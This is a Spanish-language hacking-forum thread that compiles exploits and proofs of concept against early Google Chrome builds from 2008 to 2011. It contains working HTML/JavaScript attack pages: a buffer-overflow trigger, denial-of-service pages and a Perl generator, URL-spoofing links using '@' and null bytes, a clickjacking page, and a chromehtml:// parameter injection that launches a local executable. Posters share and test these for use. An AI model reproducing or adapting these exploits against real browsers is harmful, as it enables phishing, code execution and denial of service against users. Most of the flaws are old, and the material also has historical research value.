AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  22. </head>
  23. Click 'Save As' function for checking this vulnerability.
  24. Note: Opening multiple Calculators.
  25.  
  26. </body>
  27. </html>

Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Trancek en 6 Septiembre 2008, 15:33 pm
berz3k es un stack-based buffer overflow, asi que usara algun Return Address que no este en tu sistema windows lo mas probable y por ello a lo mejor no te funcionara, digo yo..porque hay varias PoC, yo es que pase de bajarme todavia el Chrome, estoy agusto con firefox


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: sirdarckcat en 6 Septiembre 2008, 21:52 pm
Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
Falso
prueba poniendo Alert(123) en firefox ;)

De lo del BoF, pues que cagado jajaja.. aunque si funciona tengo screenshots :¬¬ jaja

Saludos!!


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: MabUse en 6 Septiembre 2008, 21:59 pm
Código:
<script>
var snoopWin;

function run() {
snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480');
snoopWin.blur();
setTimeout("snoopy()",1000);
}

function snoopy() {
alert(snoopWin.location);
setTimeout("snoopy()", 100);

}
</script>



<a href="javascript:run();">http://www.google.com/</a>

But, if:

Código:
<script>
var snoopWin;

function run() {
snoopWin = window.open('http://www.gmail.com@foro.elhacker.net/','snoopWindow','width=640,height=480');
snoopWin.blur();
setTimeout("snoopy()",1000);
}

function snoopy() {
alert(snoopWin.location);
setTimeout("snoopy()", 1000);

}
</script>



<a href="javascript:run();">http://www.google.com/</a>


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 8 Septiembre 2008, 15:11 pm

Portal dedicado a las vulnerabilidades de Chrome:

Código:
Google Chrome Silent Crash Exploit
Google Chrome Inspect Element DoS Exploit
Google Chrome Buffer Overflow
Google Chrome Invalid URL Crash
Google Chrome Omnibox Keylogger
Google Chrome Comic Book
Uninstalling Chrome - Is it something we said.
Google Chrome Carpet Bombing Vulnerability
Chrome Keyboard Shortcuts
Chrome Easter Eggs
Google Chrome Released

Muy gracioso los comics, ademas los Chrome Easter Eggs, como todo programa oculta los credits y demas sopresas, pero tambien informacion valiosa para  algun atacante:

Código:
about:internets
about:version
about:stats
about:memory
about:plugins
about:histograms
about:cache
about:dns
about:network
about:crash
about:hang (can crash your browser)
about:% (can crash your browser)

Me resulto bastante bueno al ejecutar "about:memory" la cantidad de memoria que consume Firefox comparado con Chrome.

fuente: http://chromekb.com

-berz3k.







Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 9 Septiembre 2008, 06:47 am
Se ve bueno el sitio.

Código:
http://chromekb.com/vulnerabilities/"><h1>ARREGLENMEE!</h1>






fuente:
http://www.jccharry.com/fake/1.txt


Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 9 Septiembre 2008, 14:37 pm
Google fixea vulnerabilidades en su navegador Chrome

Google Releases New Browser Chrome - Vulnerabilities on First Day

So as most of you probably know the big buzz on the Internet last week was that Google (after supporting Firefox for so long) have actually launched their own browser.

It’s cooled Google Chrome. Now of course in typical Google fashion they call it BETA software, and a number of flaws have popped up during the first couple of days of release.

One cool thing though is that each tab runs it’s own threaded process, so if one tab bombs out it won’t take down your whole browser.

The browser is a move for Google into the online/offline integration they started with Google Desktop, there are more and more online apps (Google Office) that people still want to use offline with a Google made browser this will be possible.

You also have to consider the privacy implications though, if you are also using Gmail…Google will basically know everything you do, even worse if you also use Google Desktop they will know what you have on your computer, what e-mail you send and receive and what you surf on the web.


Curioso video donde los ciudadanos Alemanes no usaran Chrome, lo olvide postear antes:

http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome (http://valleywag.com/5046665/german-government-tells-citizens-not-to-use-google-chrome)

Abra que testear lo nuevo de Chrome.

-berz3k.





Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 25 Septiembre 2008, 03:15 am
Nuevo Exploit en milw0rm

Versiones afectadas

Chrome/0.2.149.29
Chrome/0.2.149.30



Código:
<html>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<head>
<script language="javascript">

window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");


</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>


<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example:
using alert function will make it more exhaustive.</b></br></br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b>
<hr></hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</body>

</html>


-berz3k.



Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 30 Septiembre 2008, 03:37 am
Versiones afectadas

Chrome/0.2.149.30
Chrome/0.2.149.29
Chrome/0.2.149.27


fuente:http://www.milw0rm.com/exploits/6609

Remote DoS Exploit
Código:

<html>
<head>
<title>Google Chrome Window Object Suppressing Remote Denial of Service.</title>
</head>


<body onLoad="window.close();">
<center>
<b>Note: Design Flaw.Zero Security Check. Script Can Be Used to Kill Parent Window Directly Leading to Denial of Service.</b><br><br>
</center>
</body>
</html>




(http://img442.imageshack.us/img442/138/30ld7.png) (http://imageshack.us)
(http://img442.imageshack.us/img442/30ld7.png/1/w444.png) (http://g.imageshack.us/img442/30ld7.png/1/)







Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 26 Noviembre 2008, 14:03 pm

Google Chrome MetaCharacter URI Obfuscation Vulnerability

Google chrome is vulnerable to URI Obfuscation vulnerability. An attacker can easily perform malicious redirection by manipulating the browser functionality. The link can not be traversed properly in status address bar.This could facilitate the impersonation of legitimate web sites in order to steal sensitive information from unsuspecting users. The URI specified with @ character with or without NULL character causes the vulnerability.

Vulnerable Systems:
 * Chrome version 0.2.149.30
 * Chrome version 0.2.149.29
 * Chrome version 0.2.149.27

Proof of Concept:

Link1: ftp://anoymous:guest@microsoft.com
Link2: [Without NULL] | http://www.google.com@yahoo.com | [Google --> Yahoo [Obfuscation]]

Link3: http://www.secniche.org%00@www.milw0rm.com [With NULL] SecNiche --> Milw0rm [Obfuscation]

fuente:
http://www.secniche.org/gcuri/index.html (http://www.secniche.org/gcuri/index.html)

-berz3k.



Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 27 Diciembre 2008, 12:48 pm
Nuevo Exploit 23.12.2008

Vulnerable Systems:
* Chrome version 1.0.154.36

Google Chrome Browser (ChromeHTML://) Remote Parameter Injection
fuente: http://www.milw0rm.com

Código:
<!--
Google Chrome Browser (ChromeHTML://) remote parameter injection POC
by Nine:Situations:Group::bellick&strawdog
Site: http://retrogod.altervista.org/
tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3
List of command line switches:
http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc
Original url: http://retrogod.altervista.org/9sg_chrome.html

click the following link with IE while monitoring with procmon
-->
<a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a>

No rula en:
Windows Vista SP1, que alguien confirme el bug en XP SP3 con algun PoC


(http://i.elhacker.net/i?i=Q90VHmFnAn4I8EG04qLjumVo) (http://i.elhacker.net/d?i=Q90VHmFnAn4I8EG04qLjumVo)

(http://i.elhacker.net/i?i=b0-yGZkNI1OnkRuPIrAwyGVo) (http://i.elhacker.net/d?i=b0-yGZkNI1OnkRuPIrAwyGVo)

-berz3k.




Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Novlucker en 2 Enero 2009, 15:05 pm
Bueno, menos mal que berz3k ha posteado hace algunos días, así evito tener que revivir un post viejo  :xD

Curiosidad: Alguien ha "jugado" con la versión final/estable de chrome y los fallos que se encuentran en este post?
Es que me gustaría saber si los de google han arreglado algo o estos errores permanecen  :rolleyes: , sino tocará probar por mi mismo  :xD

Saludos


Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 3 Enero 2009, 21:09 pm
@Novlucker

La gran mayoria estan fixeados (he jugado con todos) excepto este ultimo que he probado sobre vista, vaya; se que es un bug que afecta a XP sp3, tendre que revivir mi vieja laptop :D.

-berz3k.


Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: THAL en 24 Enero 2009, 17:26 pm
Una vez abierto google chrome cuand busco cualquier tema, me sale este error:
mc7cQ7Hk���S��"�:�n�.����XP

o este:

mc7cQ7Hk���S��"�3�g�'����1N

Alguna sugerencia?


Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 27 Enero 2009, 22:49 pm
@THAL
Que version haz instalado Linux/Win32? , seguramente no se ha instalado correctamente, postearme una screen y los pasos que ejecutas para conocer el bug.

-berz3k.


Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 29 Enero 2009, 05:05 am

Nuevo Exploit 23.01.2009

Vulnerable Systems:
* Chrome version 1.0.154.43

Google Chrome 1.0.154.43 ClickJacking Vulnerability (2009-01-23)


fuente: http://www.milw0rm.com/exploits/7903

Código:
<html>
<style type="text/css">
<!--
.style1 {
 font-size: 50px;
 font-weight: bold;
}
.style2 {
 color: #FF0000;
 font-weight: bold;
 font-size: 24px;
}
-->
</style>
<body>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.cyber-warrior.org/x0x';">This</div>
<p><strong>
  <script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>


(http://i.elhacker.net/i?i=hNJdOfgtjU7qgRcwx2wMYGVo) (http://i.elhacker.net/d?i=hNJdOfgtjU7qgRcwx2wMYGVo)

MMMMM, a todos les funciona? me parece no se este ejecutando bien

does any1 with more details?


-berz3k.












Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: TheDarkFear en 23 Marzo 2009, 20:50 pm
Google Chrome Single Thread Alert Out of Bounds Memory Access Vulnerability

Versión afectada:

Google Chrome 1.0.154.48

Exploit:
http://www.securityfocus.com/data/vulnerabilities/exploits/34130-galrt.zip

No puede hacer poc ya se me habia actualizado a la versión mas reciente.

Fuente:
http://www.securityfocus.com/bid/34130



Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 4 Enero 2010, 08:51 am

Nuevo DoS PoC 2010-01-03

Google Chrome 4.0.249.30 DoS PoC

Fuente:
:http://www.exploit-db.com/exploits/10960

Exploit:

Código:

#!/usr/bin/perl
#google chrome 4.0.249.30 DoS PoC
#
#
#Author: Teo Manojlovic
#
#Info: In ordinary cases browser would redirect to "http://www.google.com"
#but in this case browser will report error for something that should
#be possible and is possible on other browsers.
#
#
#
#I would like to thank Jeremy Brown who made very nice fuzzer for browser
#
#
#
#
#
#
#
#Ipak lik nije tolika seljacina koliko sam mislio da je, jer mu pdf fuzzer malo suxa
 
 
$file="poc.html";
$poc='a/' x 10000000;
open(myfile,">>$file");
print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
print myfile "<body alink=";
print myfile $poc;
print myfile '">';
close(myfile);
print "Finished\n";



PoC DoS
(http://i.elhacker.net/i?i=YRO-5w8WBYZdV3xW0xHSMGVo) (http://i.elhacker.net/d?i=YRO-5w8WBYZdV3xW0xHSMGVo)


Lo he probado en la version 3.0.195.38, no he actualizado posteen link para descargar la version 4.0.249.30 y testear este PoC.


-berz3k.






Título: Re: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 25 Octubre 2011, 20:51 pm
Nuevo Exploit para Chrome, no lo he cofirmado, y algunos mas no los he posteado.

wCzDHqKXq6k

-berz3k.